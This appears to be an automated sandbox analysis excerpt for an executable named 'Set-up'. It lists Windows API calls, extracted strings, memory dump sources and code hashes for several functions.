                                                                                                                                  • Source File: 00000000.00000002.2074330703.0000000005470000.00000040.00001000.00020000.00000000.sdmp, Offset: 05470000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5470000_Set-up.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                  • Instruction ID: 21f3dc19fddeba55aba76a117cc1e69b38a8d762a675de7915e11c1fca4af754
                                                                                                                                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                  • Instruction Fuzzy Hash: 59B11379604605ABDB61AE61CC84EFBBFE9FF85300F1015EFE58A82241E731E451CBA1
                                                                                                                                  APIs
                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 058F1219
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeSecurity
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 640775948-0
                                                                                                                                  • Opcode ID: 0abdb89343d90c00b7aa932b8d42737518c3b4752db76d46048d4551505fa6ad
                                                                                                                                  • Instruction ID: aee97442b0cf4c0067419d67565fbdaa094f02b965669bf98f2e8b729025eca1
                                                                                                                                  • Opcode Fuzzy Hash: 0abdb89343d90c00b7aa932b8d42737518c3b4752db76d46048d4551505fa6ad
                                                                                                                                  • Instruction Fuzzy Hash: 66D092303E8301B6E6748618EC13F103A549705B26F702208F363EE6C1CDE079108A08
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131AE20,00000001,00000000), ref: 00E4EB19
                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?), ref: 00E4EB34
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlEnterCriticalSection), ref: 00E4EB42
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlLeaveCriticalSection), ref: 00E4EB53
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 00E4EB64
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryVolumeInformationFile), ref: 00E4EB75
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryObject), ref: 00E4EB86
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 00E4EB97
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlCompareUnicodeString), ref: 00E4EBA8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00E4EBB9
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 00E4EBCA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtCreateFile), ref: 00E4EBDB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtOpenFile), ref: 00E4EBEC
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtCancelIoFile), ref: 00E4EBFD
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtClose), ref: 00E4EC0E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 00E4EC1F
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtOpenKeyedEvent), ref: 00E4EC30
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 00E4EC41
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 00E4EC52
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtSetInformationFile), ref: 00E4EC63
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryInformationFile), ref: 00E4EC74
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQueryDirectoryFile), ref: 00E4EC85
                                                                                                                                  • InterlockedExchange.KERNEL32(0131AE20,00000002), ref: 00E4EC97
                                                                                                                                  • SwitchToThread.KERNEL32(?,?,?,?,?), ref: 00E4ECD5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ExchangeInterlocked$CompareHandleModuleSwitchThread
                                                                                                                                  • String ID: NtCancelIoFile$NtClose$NtCreateFile$NtCreateKeyedEvent$NtOpenFile$NtOpenKeyedEvent$NtQueryDirectoryFile$NtQueryInformationFile$NtQueryInformationProcess$NtQueryObject$NtQueryVolumeInformationFile$NtReleaseKeyedEvent$NtSetInformationFile$NtWaitForKeyedEvent$RtlCompareUnicodeString$RtlEnterCriticalSection$RtlGetVersion$RtlLeaveCriticalSection$RtlNtStatusToDosError$RtlVerifyVersionInfo$ntdll.dll
                                                                                                                                  • API String ID: 925111853-3771141770
                                                                                                                                  • Opcode ID: 3df8becc718e26ab30a328e34bb31b9341cff35d2e972572ed01fe4689fe2fd1
                                                                                                                                  • Instruction ID: a080e629e82483f0985af96f7e4e58eb98eb411f1de807ab44c387ba8937b9ab
                                                                                                                                  • Opcode Fuzzy Hash: 3df8becc718e26ab30a328e34bb31b9341cff35d2e972572ed01fe4689fe2fd1
                                                                                                                                  • Instruction Fuzzy Hash: 0F4193785D1710AFE3399F21E889A6A3FB9FB19712F001079FC25D120CD7B82655CB65
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E4EAD0: InterlockedCompareExchange.KERNEL32(0131AE20,00000001,00000000), ref: 00E4EB19
                                                                                                                                    • Part of subcall function 00E4EAD0: GetModuleHandleW.KERNEL32(ntdll.dll,?,?), ref: 00E4EB34
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlEnterCriticalSection), ref: 00E4EB42
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlLeaveCriticalSection), ref: 00E4EB53
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 00E4EB64
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtQueryVolumeInformationFile), ref: 00E4EB75
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtQueryObject), ref: 00E4EB86
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 00E4EB97
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlCompareUnicodeString), ref: 00E4EBA8
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00E4EBB9
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,RtlVerifyVersionInfo), ref: 00E4EBCA
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtCreateFile), ref: 00E4EBDB
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtOpenFile), ref: 00E4EBEC
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtCancelIoFile), ref: 00E4EBFD
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtClose), ref: 00E4EC0E
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 00E4EC1F
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtOpenKeyedEvent), ref: 00E4EC30
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 00E4EC41
                                                                                                                                    • Part of subcall function 00E4EAD0: GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 00E4EC52
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00E4E01F
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 00E4E027
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 00E4E02F
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 00E4E037
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000002), ref: 00E4E0BA
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00E4E0FE
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00E4E165
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000001,00000001), ref: 00E4E1CD
                                                                                                                                  • GetLastError.KERNEL32(00000107,?,?,00000000), ref: 00E4E2FD
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00E4E320
                                                                                                                                  • LoadLibraryW.KERNEL32(00000000,version.dll,00000000,00000107,?,?,00000000), ref: 00E4E3EB
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeW), ref: 00E4E41C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetFileVersionInfoW), ref: 00E4E42E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerQueryValueW), ref: 00E4E440
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00E4E5B4
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 00E4E5BC
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000004,00000001), ref: 00E4E5F4
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000020,00000001), ref: 00E4E664
                                                                                                                                  • LoadLibraryW.KERNEL32(00000000,netapi32.dll,?), ref: 00E4E731
                                                                                                                                  • GetProcAddress.KERNEL32(?,NetWkstaGetInfo), ref: 00E4E757
                                                                                                                                  • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 00E4E765
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 00E4E7CF
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000), ref: 00E4E7D7
                                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00E4E830
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00E4E847
                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00E4E85F
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000004,00000002), ref: 00E4E8CA
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000004,00000001), ref: 00E4E939
                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000004,00000001), ref: 00E4E952
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ConditionMask$ErrorLastLibrary$Load$CompareDirectoryExchangeFreeHandleInterlockedModuleSystem
                                                                                                                                  • String ID: !af_ && length()$4$GetFileVersionInfoSizeW$GetFileVersionInfoW$NetApiBufferFree$NetWkstaGetInfo$VerQueryValueW$basic_ncstring<wchar_t>::back$kernel32.dll$netapi32.dll$version.dll
                                                                                                                                  • API String ID: 2630566882-2361735218
                                                                                                                                  • Opcode ID: 3525aeb30ed8c3b0b581bb21adcefc57ec6141f54de53d60154f39cd6a285c37
                                                                                                                                  • Instruction ID: a190f3838e520e3359c509f3fe16a565e50033890409a9bbf022316e3dc40a3c
                                                                                                                                  • Opcode Fuzzy Hash: 3525aeb30ed8c3b0b581bb21adcefc57ec6141f54de53d60154f39cd6a285c37
                                                                                                                                  • Instruction Fuzzy Hash: 24524070A012289BDB38DB24DC89BEEB7B5BB59704F1050E9E649B7381DBB45E84CF50
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                  • DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,, PID ,00000006,9.39,00000004,', version ,?,00000000,Ensure check failed in module ',0000001F,-000000C7), ref: 00E447C5
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E44809
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E4498E
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E449BE
                                                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 00E44A51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentException@8Throw$BreakConcurrency::cancel_current_taskDebugDebuggerFileModuleNamePresentProcessThread___std_exception_copy
                                                                                                                                  • String ID: ', line $', version $, PID $, TID $, function '$9.39$Call stack:$Ensure check failed in module '
                                                                                                                                  • API String ID: 1077365137-295359884
                                                                                                                                  • Opcode ID: 61a30823a19c80ace10a5ee442747480f99736149de509f3be1c39df3fecf659
                                                                                                                                  • Instruction ID: bc4c9255e1753098582f9bf74aed3310b4df230077d73db557535375a0f1f112
                                                                                                                                  • Opcode Fuzzy Hash: 61a30823a19c80ace10a5ee442747480f99736149de509f3be1c39df3fecf659
                                                                                                                                  • Instruction Fuzzy Hash: 09D1BEB1A01218AFDB25DF64EC45BEAB7F8AF15304F544198F509B72D1DB70AA48CF90
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8), ref: 00E61FC2
                                                                                                                                    • Part of subcall function 00E63CF0: EnterCriticalSection.KERNEL32(0131B8F8), ref: 00E63D29
                                                                                                                                    • Part of subcall function 00E63CF0: WideCharToMultiByte.KERNEL32(00000000,00000400,01307E00,00000001,?,00000001,?,00000000), ref: 00E63D81
                                                                                                                                    • Part of subcall function 00E63CF0: WideCharToMultiByte.KERNEL32(00000000,00000400,01307DF8,00000001,?,00000001,0000003F,00000000), ref: 00E63DBC
                                                                                                                                    • Part of subcall function 00E63CF0: WideCharToMultiByte.KERNEL32(00000000,00000400,01307DFC,00000001,?,00000001,0000003F,00000000), ref: 00E63DF8
                                                                                                                                    • Part of subcall function 00E63CF0: WideCharToMultiByte.KERNEL32(00000000,00000400,01307DF0,00000001,?,00000001,0000003F,00000000), ref: 00E63E2F
                                                                                                                                    • Part of subcall function 00E5EFB0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5EFE9
                                                                                                                                    • Part of subcall function 00E5EFB0: LeaveCriticalSection.KERNEL32(0131B8F8,?,?), ref: 00E5F064
                                                                                                                                  • GetConsoleOutputCP.KERNEL32(?), ref: 00E6203D
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E62140
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E6217B
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E622B3
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E622EE
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E62452
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E6248B
                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00E6267F
                                                                                                                                  • GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?), ref: 00E626F8
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8,?), ref: 00E62771
                                                                                                                                  Strings
                                                                                                                                  • !af_ && i<length(), xrefs: 00E62439
                                                                                                                                  • NumCast, xrefs: 00E62797
                                                                                                                                  • basic_ncstring<wchar_t>::operator [], xrefs: 00E62434
                                                                                                                                  • value <= std::numeric_limits<OutType>::max(), xrefs: 00E6279C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Concurrency::cancel_current_task$CriticalSection$ByteCharMultiWide$Enter$ConsoleLeave$BufferInfoOutputScreen
                                                                                                                                  • String ID: !af_ && i<length()$NumCast$basic_ncstring<wchar_t>::operator []$value <= std::numeric_limits<OutType>::max()
                                                                                                                                  • API String ID: 3864998577-1646068431
                                                                                                                                  • Opcode ID: 05f03513a2ed5d47ecb774a6e65771fa0b5e783c0b7e803885bb75e11b87de8e
                                                                                                                                  • Instruction ID: 7fe86ac46bc0d5af8f9dcab80c510882ce03db03dc63bcab5d4163a6ae668b7f
                                                                                                                                  • Opcode Fuzzy Hash: 05f03513a2ed5d47ecb774a6e65771fa0b5e783c0b7e803885bb75e11b87de8e
                                                                                                                                  • Instruction Fuzzy Hash: 1642F530A84A198EDF28CB74E894BBEB7F5AF10394F14662DD626F72D0DB349981C750
                                                                                                                                  APIs
                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,460C02D8,?,00000000), ref: 00E8C9B7
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00E8CA33
                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E8CA50
                                                                                                                                  • PathIsPrefixW.SHLWAPI(00000000,?,?,?,?,?,?,?,00000000), ref: 00E8CB88
                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00E8CC5C
                                                                                                                                    • Part of subcall function 00E488C0: GetLastError.KERNEL32 ref: 00E488FA
                                                                                                                                    • Part of subcall function 00E488C0: CloseHandle.KERNEL32(00720043), ref: 00E48919
                                                                                                                                    • Part of subcall function 00E488C0: SetLastError.KERNEL32(00000000), ref: 00E48932
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00000000), ref: 00E8CFE5
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E8D014
                                                                                                                                    • Part of subcall function 00E6A6D0: new.LIBCMT ref: 00E6A6FD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Process32$CloseCreateCurrentException@8FirstHandleNextPathPrefixProcessSnapshotThrowToolhelp32
                                                                                                                                  • String ID: !af_$!af_ && i<s_$CreateToolhelp32Snapshot()$datavect<unsigned long *>::operator []$datavect<unsigned long *>::size$ncvector<unsigned long>::operator []
                                                                                                                                  • API String ID: 1675070532-1998510845
                                                                                                                                  • Opcode ID: df1857c6406994e453dfc9450cbfd0ef9d460d837e8c7b27394d85408861523e
                                                                                                                                  • Instruction ID: 332718968106c3ba429a9b97f49257c365ddb15e6459af47906abb249f4532ef
                                                                                                                                  • Opcode Fuzzy Hash: df1857c6406994e453dfc9450cbfd0ef9d460d837e8c7b27394d85408861523e
                                                                                                                                  • Instruction Fuzzy Hash: AB126DB1A002589FDB24DF14CD44B9DBBB5AF46308F1450E9D60DB7282DB716E88CF65
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,$.$0$0$0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                                                                                  • API String ID: 0-592371532
                                                                                                                                  • Opcode ID: 62d7f093094b33026935579788bb0f83e9a85cd3b20d97f04cad85cc92ca6094
                                                                                                                                  • Instruction ID: 5a565eb994c09b88593eadd94ecec04f272464d0dfa83661e866a536dd34884f
                                                                                                                                  • Opcode Fuzzy Hash: 62d7f093094b33026935579788bb0f83e9a85cd3b20d97f04cad85cc92ca6094
                                                                                                                                  • Instruction Fuzzy Hash: 5472B0756093418FD314CE28C48076ABBF6BB8A204F188A6DEC9BD7391D775DD05CB82
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: }0C$ke$BM$QD$lo$#=$'!$ga$sRm$wq$}{
                                                                                                                                  • API String ID: 0-4000922688
                                                                                                                                  • Opcode ID: 915122c7f8618750c46a0e0caa564b6e86f407211bfd103f5e4755bf4bac5061
                                                                                                                                  • Instruction ID: ada1efce72b9fcc5709234768627ea3d58c3078a5bcecdd8401c4772cf5d6054
                                                                                                                                  • Opcode Fuzzy Hash: 915122c7f8618750c46a0e0caa564b6e86f407211bfd103f5e4755bf4bac5061
                                                                                                                                  • Instruction Fuzzy Hash: 0132B8B410D3858AE274CF259586BCFBBE1BB92344F208D1DD2E99B255DB708186CF93
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $0$0$1$1$2$2$D$E$J$P
                                                                                                                                  • API String ID: 0-1153050706
                                                                                                                                  • Opcode ID: a33acdf0239a95babaf2afd5ccf81056757fbd8e264ca0ad47a45dd708770055
                                                                                                                                  • Instruction ID: 4ffc16c6ae8093835988e47cc70ea7f84d5a597c9dea6ad8510fa6f4418123ce
                                                                                                                                  • Opcode Fuzzy Hash: a33acdf0239a95babaf2afd5ccf81056757fbd8e264ca0ad47a45dd708770055
                                                                                                                                  • Instruction Fuzzy Hash: 21B13663A0D7E04AD311857C8C8435BAEC75BE6134F1D8BADE9E1C77C2D5A9C8068397
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?,?), ref: 00E62CC1
                                                                                                                                    • Part of subcall function 00E5EFB0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5EFE9
                                                                                                                                    • Part of subcall function 00E5EFB0: LeaveCriticalSection.KERNEL32(0131B8F8,?,?), ref: 00E5F064
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Enter$Leave
                                                                                                                                  • String ID: !af_ && i<length()$1$NumCast$basic_ncstring<wchar_t>::operator []$value <= (InType) std::numeric_limits<OutType>::max()$value >= 0
                                                                                                                                  • API String ID: 2801635615-1729119799
                                                                                                                                  • Opcode ID: aebd92225cf6b71c560fc8bd5d6709f071cb81449285d681ea8118c08a137179
                                                                                                                                  • Instruction ID: 6bf088f10a211e572d16eb21fbec52e9abfad061bd659c861e03e9331782d12c
                                                                                                                                  • Opcode Fuzzy Hash: aebd92225cf6b71c560fc8bd5d6709f071cb81449285d681ea8118c08a137179
                                                                                                                                  • Instruction Fuzzy Hash: 27929C71E002589FDF24DFA4D854BEEBBB4AF14344F145199E40ABB281DB70AE88CF91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: -$.$0123456789ABCDEFXP$0123456789abcdefxp$A$gfff$gfff$gfff$gfff
                                                                                                                                  • API String ID: 0-3824892235
                                                                                                                                  • Opcode ID: f5f721cf1db68718feca4f7007a69207216d13077a2f07e9a5abd9cc7ffe5d7d
                                                                                                                                  • Instruction ID: 47514dcb76b054c9a33e4c4a16027c054851608476d15250f7441c9306442efd
                                                                                                                                  • Opcode Fuzzy Hash: f5f721cf1db68718feca4f7007a69207216d13077a2f07e9a5abd9cc7ffe5d7d
                                                                                                                                  • Instruction Fuzzy Hash: 5CF1B075A0D7418FC318CE29C49066AFBE2BBCA304F088A2DE99AD7391D775DD05CB42
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $ $ $ $ $ $ $@
                                                                                                                                  • API String ID: 0-1229966368
                                                                                                                                  • Opcode ID: 91f5bc4ce1c782f9eae9c5e52da583c4dc7e95ea3cf622b8983e9fb26c5c4050
                                                                                                                                  • Instruction ID: 7b40b8c2e56118e5d7c45ea6707c93bdcba8a440bc6f05669d9539ccab897de1
                                                                                                                                  • Opcode Fuzzy Hash: 91f5bc4ce1c782f9eae9c5e52da583c4dc7e95ea3cf622b8983e9fb26c5c4050
                                                                                                                                  • Instruction Fuzzy Hash: 11B2D4756083519FC719CE28C89062ABBF3BBD6214F188A6DEC96CB351DB75EC05CB81
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$datavect<class CmdLine::ItemData *>::size$datavect<unsigned int *>::size$help$ncvector<class CmdLine::ItemData>::end
                                                                                                                                  • API String ID: 0-595236504
                                                                                                                                  • Opcode ID: de522ea14a093871e5117763ed827ac5793fb96c335aed55d2aa4457e1c20c5b
                                                                                                                                  • Instruction ID: ab775c4d99d46148241333155dd33245dcf030d859714f107766a388850195d8
                                                                                                                                  • Opcode Fuzzy Hash: de522ea14a093871e5117763ed827ac5793fb96c335aed55d2aa4457e1c20c5b
                                                                                                                                  • Instruction Fuzzy Hash: 9D0278B1A01208AFDB24CF98C995BDEBBF4EF04314F108519E955BB3D1D776AA09CB90
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2074582672.00000000058E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 058E1000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_58e1000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: S$_$f$z$|
                                                                                                                                  • API String ID: 0-1364545660
                                                                                                                                  • Opcode ID: 2f652a6f6a6bc7fed3cf7dd40d6742ea5a3b9819983657587b68657c4ccf7003
                                                                                                                                  • Instruction ID: c1b60bb1e29d667527b2be58bb673336ae26c6a6ff42cad642e9ea07de146830
                                                                                                                                  • Opcode Fuzzy Hash: 2f652a6f6a6bc7fed3cf7dd40d6742ea5a3b9819983657587b68657c4ccf7003
                                                                                                                                  • Instruction Fuzzy Hash: 49F1B672A0D7508BC724DB7C84883AEBBE2AB99224F194A3DDDD9C73D1D6748C418783
                                                                                                                                  APIs
                                                                                                                                  • InterlockedExchange.KERNEL32(0131ADF8,00000001), ref: 00E459BE
